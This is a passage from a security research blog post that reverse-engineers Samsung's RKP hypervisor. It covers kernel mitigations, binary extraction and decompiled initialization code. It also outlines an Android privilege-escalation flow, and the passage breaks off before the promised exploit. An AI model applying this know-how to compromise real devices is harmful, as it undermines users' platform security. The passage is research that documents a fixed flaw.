Longterm Security

A Samsung RKP Compendium

Post by Alexandre Adamski

This first goal of this blog post is to serve as a comprehensive reference of Samsung RKP's inner workings. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. Our explanations are often accompanied by snippets of decompiled code that you can feel free to skip over.

The second goal, and maybe of interest to more people, is to reveal a now-fixed vulnerability that allows getting code execution at EL2 in Samsung RKP. It is a good example of a simple mistake that compromises platform security as the exploit consists of a single call that allows getting hypervisor memory writable at EL1.

In the first part, we will talk briefly about Samsung's kernel mitigations (that would probably deserve a blog post of their own). In the second part, we will explain how to get your hand on the RKP binary for your device.

In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel pages tables, how it protects sensitive data structures, and finally how it enables the kernel mitigations.

In the fifth and last part, we will reveal the vulnerability, the one-liner exploit and take a look at the patch.

Introduction
Kernel Exploitation
- JOPP
- ROPP
- KDP
Getting Started
Hypervisor Framework
Digging Into RKP
Vulnerability
Conclusion
References

Introduction

In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges and execute malicious code.

It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, or "Real-time Kernel Protection", is the name of Samsung's hypervisor implementation which is part of Samsung KNOX.

There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study which we both highly recommend that you read before this blog post.

Kernel Exploitation

A typical local privilege escalation (LPE) flow on Android involves:

bypassing KASLR by leaking a kernel pointer;
getting a one-off arbitrary kernel memory read/write;
using it to overwrite a kernel function pointer;
calling a function to set the address_limit to -1;
bypassing SELinux by writing selinux_(enable|enforcing);
escalating privileges by writing the uid, gid, sid, capabilities, etc.

Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place though.

Here is what we observed after downloading various firmware updates:

Device	Region	JOPP	ROPP	KDP
Low-end	International	No	No	Yes
Low-end	United States	No	No	Yes
High-end	International	Yes	No	Yes
High-end	United States	Yes	Yes	Yes

JOPP

Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It first uses a modified compiler toolchain to place a NOP instruction before each function start. It then uses a Python script (Kernel/scripts/rkp_cfp/instrument.py) to process the compiled kernel binary and replace NOPs with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.

The helper function jopp_springboard_blr_rX (in Kernel/init/rkp_cfp.S) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:

    .macro  springboard_blr, reg
    jopp_springboard_blr_\reg:
    push    RRX, xzr
    ldr RRX_32, [\reg, #-4]
    subs    RRX_32, RRX_32, #0xbe7, lsl #12
    cmp RRX_32, #0xbad
    b.eq    1f
    ...
    inst    0xdeadc0de //crash for sure
    ...
1:
    pop RRX, xzr
    br  \reg
    .endm

ROPP

Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30 instructions and after ldp x29, x30 instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:

    nop
    stp x29, x30, [sp,#-<frame>]!
    (insns)
    ldp x29, x30, ...
    nop

is replaced with

    eor RRX, x30, RRK
    stp x29, RRX, [sp,#-<frame>]!
    (insns)
    ldp x29, RRX, ...
    eor x30, RRX, RRK

where RRX is an alias for X16 and RRK for X17.

RRK is called the "thread key" and is unique to each kernel task. So instead of pushing directly the return address on the stack, they are XORing it first with this key, preventing an attacker from changing the return address without knowledge of the thread key.

The thread key itself is stored in the rrk field of the thread_info structure, but XORed with the RRMK.

struct thread_info {
    // ...
    unsigned long rrk;
};

RRMK is called the "master key". On production devices, it is stored in the DBGBCR5_EL1 (Debug Breakpoint Value Register 5) system register. It is set by the hypervisor during kernel initialization as we will see later.

KDP

Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. Its makes sensitive kernel data structures (like the page tables, struct cred, struct task_security_struct, struct vfsmount, SELinux status, etc.) read-only thanks to the hypervisor.

Getting Started

Hypervisor Crash Course

For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.

To paraphrase these chapters, a hypervisor is executing at a higher privilege level than the kernel, so that gives it complete control over it. Here is the architecture looks like on ARMv8 platforms:

The hypervisor can receive calls from the kernel via the HyperVisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.

Finally, the hypervisor is taking advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into Intermediate Physical Address (IPA). Then this IPA is translated into the final final Physical Address (PA) by the second stage.

Here is what the address translation looks like with 2-stage address translation enabled:

The hypervisor still only has a single stage address translation for its own memory accesses.

Our Research Platform

To make it easier to get started with this research, we have been using a bootloader unlocked Samsung A51 (SM-A515F) instead of a full exploit chain. We have downloaded the kernel source code for our device on the Samsung Open Source website, modified them and recompiled them (that did not work out of the box).

For this research, we have implemented new syscalls: - kernel memory allocation/freeing; - arbitrary read/write of kernel memory; - hypervisor call (using the uh_call function).

These syscalls makes it really convenient to interact with RKP as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.

Extracting The Binary

RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most if not all of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image which is very large and complicated.

Exynos Devices

On Exynos devices, RKP used to be embedded directly into the kernel binary and so it could be found as the vmm.elf file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf and can still be found in the kernel source archives for a few devices.

Because of Gal Beniamini's first suggested design improvements, on most devices RKP has been moved out of the kernel binary and into a partition of its own called uh. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000 bytes header that needs to be stripped to get to the real ELF file).

The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx), most likely to unify even more the code base with the Snapdragon devices, and it also features more uH "apps". However, we won't be taking a look at it in this blog post.

Snapdragon Devices

On Snapdragon devices, RKP can be found in the hyp partition, and can also be extracted from the BL_xxx.tar archive in a firmware update. It is one of the segments that make up the QHEE image.

The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.

Symbols/Log Strings

Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as it is sometimes the case with other OEMs.

By mass downloading firmware updates for various Exynos devices, we gathered around ~300 unique hypervisor binaries. None of the uh.elf files had symbols, so we had to manually port them over from the old vmm.elf files. Some of the uh.elf files had the full log strings, the latest one being from Apr 9 2019.

With the full log strings and their hashed version, we could figure out that the hash value is the simply the truncation of SHA256's output. Here is a Python one-liner to calculate the hash in case you need it:

hashlib.sha256(log_string).hexdigest()[:8]

Hypervisor Framework

The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things as "apps" are simply a bunch of commands handlers and don't have any kind of isolation.

Utility Structures

Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.

Memlists

The memlist_t structure is defined like so (names are our own):

typedef struct memlist {
    memlist_entry_t *base;
    uint32_t capacity;
    uint32_t count;
    uint32_t merged;
    crit_sec_t cs;
} memlist_t;

It is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).

The memlist entries are defined like so:

typedef struct memlist_entry {
    uint64_t addr;
    uint64_t size;
    uint64_t field_10;
    uint64_t extra;
} memlist_entry_t;

There are utility functions to add and remove ranges from a memlist, to check if an address is contained in a memlist, or if a range overlaps with a memlist, etc.

Sparsemaps

The sparsemap_t structure is defined like so (names are our own):

typedef struct sparsemap {
    char name[8];
    uint64_t start_addr;
    uint64_t end_addr;
    uint64_t count;
    uint64_t bit_per_page;
    uint64_t mask;
    crit_sec_t cs;
    memlist_t *list;
    sparsemap_entry_t *entries;
    uint32_t private;
    uint32_t field_54;
} sparsemap_t;

The sparsemap is a map that associates values to addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page field.

The sparsemap entries are defined like so:

typedef struct sparsemap_entry {
    uint64_t addr;
    uint64_t size;
    uint64_t bitmap_size;
    uint8_t* bitmap;
} sparsemap_entry_t;

There are functions to get and set the value for each entry of the map, etc.

Critical Sections

The crit_sec_t structure is used to implement critical sections (names are our own):

typedef struct crit_sec {
    uint32_t cpu;
    uint32_t lock;
    uint64_t lr;
} crit_sec_t;

And of course, there are functions to enter and exit the critical sections.

System Initialization

uH/RKP is loaded into memory by S-Boot (Samsung Bootloader). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.

uint64_t cmd_load_hypervisor() {
  // ...

  part = FindPartitionByName("UH");
  if (part) {
    dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
    ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4C);
    dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
    total_size = hdr.size + 0x1210;
    dprintf("[uH] uh total load size = 0x%x\n", total_size);
    if (total_size > 0x200000 || hdr.size > 0x1FEDF0) {
      dprintf("Could not do normal boot.(invalid uH length)\n");
      // ...
    }
    ret = memcmp_s(&hdr, "GREENTEA", 8);
    if (ret) {
      ret = -1;
      dprintf("Could not do uh load. (invalid magic)\n");
      // ...
    } else {
      ReadPartition(0x86FFF000, part->file_offset, part->block_offset, total_size);
      ret = pit_check_signature(part->partition_name, 0x86FFF000, total_size);
      if (ret) {
        dprintf("Could not do uh load. (invalid signing) %x\n", ret);
        // ...
      }
      load_hypervisor(0xC2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
      dprintf("[uH] load hypervisor\n");
    }
  } else {
    ret = -1;
    dprintf("Could not load uH. (invalid ppi)\n");
    // ...
  }
  return ret;
}

void load_hypervisor(...) {
  dsb();
  asm("smc #0");
  isb();
}

Note: On recent Samsung devices, the monitor code (based on ATF - ARM Trusted Firmware) is not longer in plain-text in the S-Boot binary. In its place can be found an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) we will need to be found so that plain-text monitor code can be dumped.

void default(...) {
  // ...

  if (get_current_el() == 8) {
    // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
    // ...
    memset(&rkp_bss_start, 0, 0x1000);
    main(saved_regs.x0, saved_regs.x1, &saved_regs);
  }
  asm("smc #0");
}

Execution starts in the default function. This function checks if it is running at EL2 before calling main. Once main returns, it makes an SMC, presumably to give the control back to S-Boot.

int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
  // ...

  // Setting A=0 (Alignment fault checking disabled)
  //         SA=0 (SP Alignment check disabled)
  set_sctlr_el2(get_sctlr_el2() & 0xFFFFFFF5);
  if (!initialized) {
    initialized = 1;
    // Check if loading address is as expected
    if (&hyp_base != 0x87000000) {
      uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
      return -1;
    }
    set_ttbr0_el2(&static_s1_page_tables_start__);
    s1_enable();
    uh_init(0x87000000, 0x200000);
    if (vmm_init())
      return -1;
    uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
    set_vttbr_el2(&static_s2_page_tables_start__);
    uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
    s2_enable();
    uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
  }
  uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
  return 0;
}

After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main sets TTBR0_EL2 to its initial page tables and calls s1_enable.

void s1_enable() {
  // ...

  cs_init(&s1_lock);
  // Setting Attr0=0xff (Normal memory, Outer & Inner Write-Back Non-transient,
  //                     Outer & Inner Read-Allocate Write-Allocate)
  //         Attr1=0x00 (Device-nGnRnE memory)
  //         Attr2=0x44 (Normal memory, Outer & Inner Write-Back Transient,
  //                     Outer & Inner No Read-Allocate No Write-Allocate)
  set_mair_el2(get_mair_el2() & 0xFFFFFFFFFF000000 | 0x4400FF);
  // Setting T0SZ=24 (TTBR0_EL2 region size is 2^40)
  //         IRGN0=0b11 && ORGN0=0b11
  //             (Normal memory, Outer & Inner Write-Back
  //              Read-Allocate No Write-Allocate Cacheable)
  //         SH0=0b11 (Inner Shareable)
  //         PAS=0b010 (PA size is 40 bits, 1TB)
  set_tcr_el2(get_tcr_el2(); &0xFFF8C0C0 | 0x23F18);
  flush_entire_cache();
  sctlr_el2 = get_sctlr_el2();
  // Setting C=1 (data is cacheable for EL2)
  //         I=1 (instruction access is cacheable for EL2)
  //         WXN=1 (writeable implies non-executable for EL2)
  set_sctlr_el2(sctlr_el2 & 0xFFF7EFFB | 0x81004);
  invalidate_entire_s1_el2_tlb();
  // Setting M=1 (EL2 stage 1 address translation enabled)
  set_sctlr_el2(sctlr_el2 & 0xFFF7EFFA | 0x81005);
}

s1_enable sets mostly cache-related fields of MAIR_EL2, TCR_EL2 and SCTLR_EL2, and most importantly enables the MMU for the EL2. main then calls the uh_init function and passes it the uH memory range.

We can already see that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...

  memset(&uh_state.base, 0, sizeof(uh_state));
  uh_state.base = uh_base;
  uh_state.size = uh_size;
  static_heap_initialize(uh_base, uh_size);
  if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
      !static_heap_remove_range(0x870FF000, 0x1000)) {
    uh_panic();
  }
  memory_init();
  uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
  uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
  uh_log('L', "main.c", 133, "==============================================================================");
  uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
  uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
  uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
  uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
  uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870FFC40, 0x3C0);
  uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
  uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
  uh_register_commands(0, init_cmds, 0, 5, 1);
  j_rkp_register_commands();
  uh_log('L', "main.c", 370, "%d app started", 1);
  system_init();
  apps_init();
  uh_init_bigdata();
  uh_init_context();
  memlist_init(&uh_state.dynamic_regions);
  pa_restrict_init();
  uh_state.inited = 1;
  uh_log('L', "main.c", 427, "[+] uH initialized");
  return 0;

After saving the arguments into a global control structure we named uh_state, uh_init calls static_heap_initialize. This function saves its arguments into global variables, and also initialize the doubly linked list of heap chunks with a single free chunk spanning over the whole uH static memory range.

uh_init then calls heap_remove_range to remove 3 important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiples ones):

the log region;
the uH (code/data/bss/stack) region;
the "bigdata" (analytics) region.

uh_init then calls memory_init.

int64_t memory_init() {
  memory_buffer = 0x87100000;
  memset(0x87100000, 0, 0x40000);
  cs_init(&memory_cs);
  clean_invalidate_data_cache_region(0x87100000, 0x40000);
  memory_buffer_index = 0;
  memory_active = 1;
  return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}

This function zeroes out the log region and maps it into the EL2 page tables. This region will be used by the *printf string printing functions which are called inside of the uh_log function.

uh_init then logs various informations using uh_log (these messages can be retrieved from /proc/uh_log on the device). uh_init then calls uh_register_commands and rkp_register_commands (which also calls uh_register_commands but with a different set of arguments).

int64_t uh_register_commands(uint32_t app_id,
                             int64_t cmd_array,
                             int64_t cmd_checker,
                             uint32_t cmd_count,
                             uint32_t flag) {
  // ...

  if (uh_state.inited)
    uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
  if (app_id >= 8)
    uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
  uh_state.cmd_evtable[app_id] = cmd_array;
  uh_state.cmd_checkers[app_id] = cmd_checker;
  uh_state.cmd_counts[app_id] = cmd_count;
  uh_state.cmd_flags[app_ip] = flag;
  uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
  if (cmd_checker)
    uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
  return 0;
}

uh_register_commands takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable, cmd_checkers, cmd_counts and cmd_flags of the uh_state structure.

According to the kernel sources, there are only 3 applications defined, even though uH supports up to 8.

// from include/linux/uh.h
#define APP_INIT    0
#define APP_SAMPLE  1
#define APP_RKP     2

#define UH_PREFIX  UL(0xc300c000)
#define UH_APPID(APP_ID)  ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)

enum __UH_APP_ID {
    UH_APP_INIT     = UH_APPID(APP_INIT),
    UH_APP_SAMPLE   = UH_APPID(APP_SAMPLE),
    UH_APP_RKP  = UH_APPID(APP_RKP),
};

uh_init then calls system_init and apps_init.

uint64_t system_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  res = uh_handle_command(0, 0, &saved_regs);
  if (res)
    uh_log('D', "main.c", 380, "system init failed %d", res);
  return res;
}

uint64_t apps_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  for (i = 1; i != 8; ++i) {
    if (uh_state.cmd_evtable[i]) {
      uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
      res = uh_handle_command(i, 0, &saved_regs);
      if (res)
        uh_log('D', "main.c", 396, "app init failed %d", res);
    }
  }
  return res;
}

These functions call the command #0, system_init of APP_INIT, and apps_init of all the other registered applications. In our case, it will end up calling init_cmd_init and rkp_cmd_init as we will see later.

int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...

  if ((uh_state.cmd_flags[app_id] & 1) != 0)
    uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
           regs->x5);
  cmd_checker = uh_state.cmd_checkers[app_id];
  if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
    uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
    return -1;
  }
  if (app_id >= 8)
    uh_log('D', "main.c", 453, "wrong dst %d", app_id);
  if (!uh_state.cmd_evtable[app_id])
    uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
  if (cmd_id >= uh_state.cmd_counts[app_id])
    uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
  cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
  if (!cmd_handler) {
    uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
    return -1;
  }
  return cmd_handler(regs);
}

uh_handle_command prints the app ID, command ID and its arguments if the debug flag was set, calls the command checker function if specified, then calls the appropriate command handler.

uh_init then calls uh_init_bigdata and uh_init_context.

int64_t uh_init_bigdata() {
  if (!bigdata_state)
    bigdata_state = malloc(0x230, 0);
  memset(0x870FFC40, 0, 960);
  memset(bigdata_state, 0, 560);
  return s1_map(0x870FF000, 0x1000, UNKN3 | WRITE | READ);
}

uh_init_bigdata allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read and write in the EL2 page tables.

int64_t* uh_init_context() {
  // ...

  uh_context = malloc(0x1000, 0);
  if (!uh_context)
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  return memset(uh_context, 0, 0x1000);
}

uh_init_context allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).

uh_init calls memlist_init to initialize the dynamic_regions memlist in the uh_state structure, and then calls the pa_restrict_init function.

int64_t pa_restrict_init() {
  memlist_init(&protected_ranges);
  memlist_add(&protected_ranges, 0x87000000, 0x200000);
  if (!memlist_contains_addr(&protected_ranges, rkp_cmd_counts))
    uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
  if (!memlist_contains_addr(&protected_ranges, (uint64_t)&protected_ranges))
    uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
           &protected_ranges);
  return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}

pa_restrict_init initializes the protected_ranges memlist, and adds the uH memory region to it. It also checks that rkp_cmd_counts and the protected_ranges structures are contained in the memlist.

uh_init returns to main, which then calls vmm_init.

int64_t vmm_init() {
  // ...

  uh_log('L', "vmm.c", 142, ">>vmm_init<<");
  cs_init(&stru_870355E8);
  cs_init(&panic_cs);
  set_vbar_el2(&vmm_vector_table);
  // Setting TVM=1 (EL1 write accesses to the specified EL1 virtual
  //                memory control registers are trapped to EL2)
  hcr_el2 = get_hcr_el2() | 0x4000000;
  uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
  set_hcr_el2(hcr_el2);
  return 0;
}

vmm_init sets the VBAR_EL2 register to the exception vector used by the hypervisor and enable trapping of writes to the virtual memory control registers at EL1.

uh_init then sets the VTTBR_EL2 register to the initial pages tables that will be used for the second stage address translation for memory access at EL1. Finally, before returning it calls s2_enable.

void s2_enable() {
  // ...

  cs_init(&s2_lock);
  // Setting T0SZ=24 (VTTBR_EL2 region size is 2^40)
  //         SL0=0b01 (Stage 2 translation lookup start at level 1)
  //         IRGN0=0b11 && ORGN0=0b11
  //             (Normal memory, Outer & Inner Write-Back
  //              Read-Allocate No Write-Allocate Cacheable)
  //         SH0=0b11 (Inner Shareable)
  //         TG0=0b00 (Granule size is 4KB)
  //         PS=0b010 (PA size is 40 bits, 1TB)
  set_vtcr_el2(get_vtcr_el2() & 0xFFF80000 | 0x23F58);
  invalidate_entire_s1_s2_el1_tlb();
  // Setting VM=1
  set_hcr_el2(get_hcr_el2() | 1);
  lock_start = 1;
}

s2_enable configures the second stage address translation registers and enables it.

App Initialization

We mentioned that uh_init calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications APP_INIT (some kind of init process equivalent) and APP_RKP.

`APP_INIT`

The command handlers registered for APP_INIT are:

Command ID	Command Handler	Maximum Calls
0x00	`init_cmd_init`	-
0x02	`init_cmd_add_dynamic_region`	-
0x03	`init_cmd_id_0x03`	-
0x04	`init_cmd_initialize_dynamic_heap`	-

Let's take a look at command #0 called during startup by uH.

int64_t init_cmd_init(saved_regs_t* regs) {
  // ...

  if (!uh_state.fault_handler && regs->x2) {
    uh_state.fault_handler = rkp_get_pa(regs->x2);
    uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
  }
  return 0;
}

The command #0 handler of APP_INIT is really simple: it sets the fault_handler field of uh_state. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.

When uH calls this command, it won't do anything as the registers are all set to 0. But this command will also be called later by the kernel, as can been seen in the rkp_init function from init/main.c.

// from init/main.c
static void __init rkp_init(void)
{
    uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
    // ...
}

// from include/linux/uh_fault_handler.h
typedef struct uh_registers {
    u64 regs[31];
    u64 sp;
    u64 pc;
    u64 pstate;
} uh_registers_t;

typedef struct uh_handler_data{
    esr_t esr_el2;
    u64 elr_el2;
    u64 hcr_el2;
    u64 far_el2;
    u64 hpfar_el2;
    uh_registers_t regs;
} uh_handler_data_t;

typedef struct uh_handler_list{
    u64 uh_handler;
    uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;

// from init/uh_fault_handler.c
void uh_fault_handler(void)
{
    unsigned int cpu;
    uh_handler_data_t *uh_handler_data;
    u32 exception_class;
    unsigned long flags;
    struct pt_regs regs;

    spin_lock_irqsave(&uh_fault_lock, flags);

    cpu = smp_processor_id();
    uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
    exception_class = uh_handler_data->esr_el2.ec;

    if (!exception_class_string[exception_class]
        || exception_class > esr_ec_brk_instruction_execution)
        exception_class = esr_ec_unknown_reason;
    pr_alert("=============uH fault handler logging=============\n");
    pr_alert("%s",exception_class_string[exception_class]);
    pr_alert("[System registers]\n", cpu);
    pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
         uh_handler_data->esr_el2.bits,
         uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
    pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
         uh_handler_data->elr_el2);

    memset(&regs, 0, sizeof(regs));
    memcpy(&regs, &uh_handler_data->regs, sizeof(uh_handler_data->regs));

    do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, &regs);
    panic("%s",exception_class_string[exception_class]);
}

u64 uh_get_fault_handler(void)
{
    uh_handler_list.uh_handler = (u64) & uh_fault_handler;
    return (u64) & uh_handler_list;
}

They are 2 commands of APP_INIT that are used for initialization-related things (even though they don't have command ID #0). They are not called by the kernel, but by S-Boot before loading/executing the kernel.

int64_t dtb_update(...) {
  // ...
  dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
  sprintf(path, "/reserved-memory");
  offset = dtb_get_path_offset(dtb, path);
  if (offset < 0) {
    dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
  } else {
    heap_base = 0;
    heap_size = 0;
    dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
    uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
    dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
    dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
    if (get_env_var(FORCE_UPLOAD) == 5)
      rmem_size = 0x2400000;
    else
      rmem_size = 0x1700000;
    dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
  }
  // ...
}

int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
  uh_call(0xC300C000, 2, addr, size, 0, 0);
  return 0;
}

void uh_call(...) {
  asm("hvc #0");
}

S-Boot will call command #2 for each memory node in the DTB (the HVC arguments are the memory region address and size). It will then call command #4 (the arguments are two pointers to local variables of S-Boot).

int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
  // ...

  if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3)
    return -1;
  return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}

The command #2, that we named add_dynamic_region, is used to add a memory range to the dynamic_regions memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.

int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
  // ...

  if (!regs->x2 || !regs->x3)
    return -1;
  PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
  base = virt_to_phys_el1(regs->x2);
  check_kernel_input(base);
  size = virt_to_phys_el1(regs->x3);
  check_kernel_input(size);
  if (!base || !size) {
    uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
    return -1;
  }
  if (uh_state.dynamic_heap_inited)
    return -1;
  uh_state.dynamic_heap_inited = 1;
  dynamic_heap_base = *base;
  if (!regs->x4) {
    memlist_merge_ranges(&uh_state.dynamic_regions);
    memlist_dump(&uh_state.dynamic_regions);
    some_size1 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
    set_robuf_size(some_size1 + 0x600000);
    some_size2 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
    some_size3 = memlist_get_some_size(&uh_state.dynamic_regions, 0x200000);
    dynamic_heap_size = (some_size1 + some_size2 + some_size3 + 0x7FFFFF) & 0xFFE00000;
  } else {
    dynamic_heap_size = *size;
  }
  if (!dynamic_heap_base) {
    dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
  } else {
    if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
      uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
      return -1;
    }
  }
  dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
